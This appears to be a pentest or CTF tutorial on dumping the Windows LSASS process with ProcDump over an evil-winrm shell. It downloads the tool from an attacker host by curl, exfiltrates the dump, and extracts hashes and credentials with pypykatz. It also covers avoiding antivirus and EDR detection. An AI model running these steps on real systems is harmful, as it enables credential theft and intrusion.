This article is for educational purposes only! I do not encourage you to run this to a machine you do not have permission to run. Performing these actions without permission can lead to prosecution by the courts. I am not responsible for your actions!
In this short article, I will guide you to the steps you can perform to dump the LSASS process on a machine running Microsoft Windows. Without further redue, let’s get jump into it.
If you are working on a CTF or you are assigned to perform a pentest on a machine, you can come in the situation that you have to dump the LSASS process. You can use the well-known tool Mimikatz for this purpose. Mimikatz has only one big problem, it’s recognized by 57 / 70 antivirus products on VirusTotal, so using Mimikatz is not a wise choice for most environments. You have a high chance that you’re being noticed by the antivirus and so you will reveal to the blue teamers that you are in the network.
Even when you are using ProcDump you have to watch out. Some companies have deployed an EDR (Endpoint Detection and Response) solution on their systems. Most EDR solutions will generate a Medium alert when ProcDump is being used to dump a process, especially when the LSASS process is involved.
ProcDump is part of the Windows SysInternals, the main purpose of this command-line utility is to troubleshoot CPU spikes and generating crash dumps during a spike, so that an administrator or developer can determine the cause of the spike. But, it can also generate a dump of a process. And, especially the last functionality is useful in our scenario.
In this example, I have broken into a system and I want to dump the LSASS. I have already a shell on the machine through Windows Remote Management (WinRM) with evil-winrm.
On the victim machine, we have downloaded
procdump.exe to the
C:\temp directory. I have hosted a HTTP server on my attacker machine, to download the binary.
*Evil-WinRM* PS C:\temp> curl 10.10.14.13/procdump.exe -o procdump.exe
Now, we can dump the
*Evil-WinRM* PS C:\temp> .\procdump.exe -accepteula -ma lsass.exe lsass.dmp ProcDump v10.0 - Sysinternals process dump utility Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards Sysinternals - www.sysinternals.com [03:22:03] Dump 1 initiated: C:\temp\lsass.dmp [03:22:03] Dump 1 writing: Estimated dump file size is 53 MB. [03:22:04] Dump 1 complete: 53 MB written in 0.8 seconds [03:22:04] Dump count reached.
Ok, we have now the
lsass.dmp file which contains juicy information. We need to transfer this file to our attacker machine to analyze the contents.
*Evil-WinRM* PS C:\temp> download lsass.dmp Info: Downloading C:\temp\lsass.dmp to lsass.dmp Info: Download successful!
To analyze the contents we are using Pypykatz. Pypykatz is the Python implementation of Mimikatz. If you not have pypykatz installed, you can install it by running this command below.
┌──(root💀kali)-[/home/kali/hacking] └─# git clone https://github.com/skelsec/pypykatz.git Cloning into 'pypykatz'… remote: Enumerating objects: 2482, done. remote: Counting objects: 100% (852/852), done. remote: Compressing objects: 100% (348/348), done. remote: Total 2482 (delta 539), reused 754 (delta 501), pack-reused 1630 Receiving objects: 100% (2482/2482), 903.21 KiB | 4.38 MiB/s, done. Resolving deltas: 100% (1504/1504), done.
Now run Pypykatz and call the
┌──(root💀kali)-[/home/kali/hacking] └─# pypykatz lsa minidump lsass.dmp INFO:root:Parsing file lsass.dmp FILE: ======== lsass.dmp ======= == LogonSession == authentication_id 3146260 (300214) session_id 0 username Administrator domainname FUTURE logon_server FUTURE logon_time 2021-06-19T10:21:54.261897+00:00 sid S-1-5-21-1199094703-3580107816-3092147818-500 luid 3146260 == LogonSession == authentication_id 2849314 (2b7a22) session_id 0 username Administrator domainname FUTURE logon_server FUTURE logon_time 2021-06-19T10:12:08.766735+00:00 sid S-1-5-21-1199094703-3580107816-3092147818-500 luid 2849314 == LogonSession == authentication_id 347219 (54c53) session_id 1 username rodny domainname FUTURE logon_server FUTURE logon_time 2021-06-19T09:32:07.942538+00:00 sid S-1-5-21-1199094703-3580107816-3092147818-1002 luid 347219 == MSV == Username: rodny Domain: FUTURE LM: NA NT: 499ae<REDACTED>742ffe SHA1: b7c4ec<REDACTED>d18141113cc78 == WDIGEST [54c53]== username rodny domainname FUTURE password None == Kerberos == Username: rodny Domain: FUTURE Password: None == WDIGEST [54c53]== username rodny domainname FUTURE password None == CREDMAN [54c53]== luid 347219 username FUTURE\rodny domain FUTURE\rodny password [email protected]@ ...
You have now extracted the
lsass.dmp file which can contains plain text passwords. You can try to decrypt the LM hash and NT hash with hashcat.
Happy hacking! 🙂